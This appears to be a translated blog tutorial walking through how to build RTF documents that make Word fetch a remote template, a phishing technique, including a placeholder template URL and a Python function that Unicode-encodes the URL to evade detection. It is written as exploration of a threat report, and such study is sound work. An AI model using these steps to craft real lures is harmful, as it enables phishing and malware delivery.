Office RTF remote template injection

Time: 2022-01-18

Remote template injection

   Proofpoint recently published an article [1] reporting that Office phishing attacks using RTF template injection have increased in recent years. I had not looked into RTF template injection before, so let's take a look at it together (laugh, HHH).
   Creating an RTF template injection document is fairly simple. Create an RTF document, edit it with Office Word, and write any content.
image
  After saving, you will find that the document has grown from a few bytes to tens of KB. This is because a large number of RTF format attribute fields have been added.
image
   How is the template injected? RTF supports a related destination control word, \*\template. It is followed by the path of the template to use, and the whole field is enclosed in curly braces.
image
  Then open the saved RTF document directly in a text editor. For remote template injection the inserted content looks like {\*\template hxxp://xx.xx.xx.xx:port/xxx.xxx}. As for the insertion position, testing shows that the remote template is fetched whether the field is placed after a brace group, before one, or between two of them. For example:
image
   Insert the field, save the change, and open the document in Word again: the template injection works and Word requests the remote template.
image
image

Unicode URL template injection

   Going further, the value of the \*\template field can be written as Unicode escapes, which hides it better. For how to convert ASCII to this Unicode representation, see article [3]; the relevant part is as follows.
image
   Expressed as Python code:

def trans(url):
    # Each character becomes \uN? with N = ord(c) - 65536, a negative value that the
    # reader masks to 16 bits; the trailing '?' is the single fallback byte expected under \uc1.
    return ''.join(['\\u' + str(-(0xffff + 1 - ord(c))) + '?' for c in url])

  How do you build your own RTF Unicode template injection? Simply replacing the \*\template value in the original document with the Unicode form does not work. The Proofpoint article mentions the \*\wgrffmtfilter field, but after inspecting the corresponding file and running some tests, it turns out to have nothing to do with it. After comparing related techniques found online with real samples, the method turns out to depend on the \uc field in the RTF header.
  \ucN: specifies the number of bytes corresponding to each Unicode character represented by \uN within the current brace group.
image
  Now you only need to change \uc2 to \uc1 (in a Chinese-locale Word it is saved as \uc2 by default), then insert the \*\template field with the Unicode-encoded URL exactly as in the first section, and the injection works.
image

References:

[1] https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread
[2] http://www.biblioscape.com/rtf15_spec.htm
[3] https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/
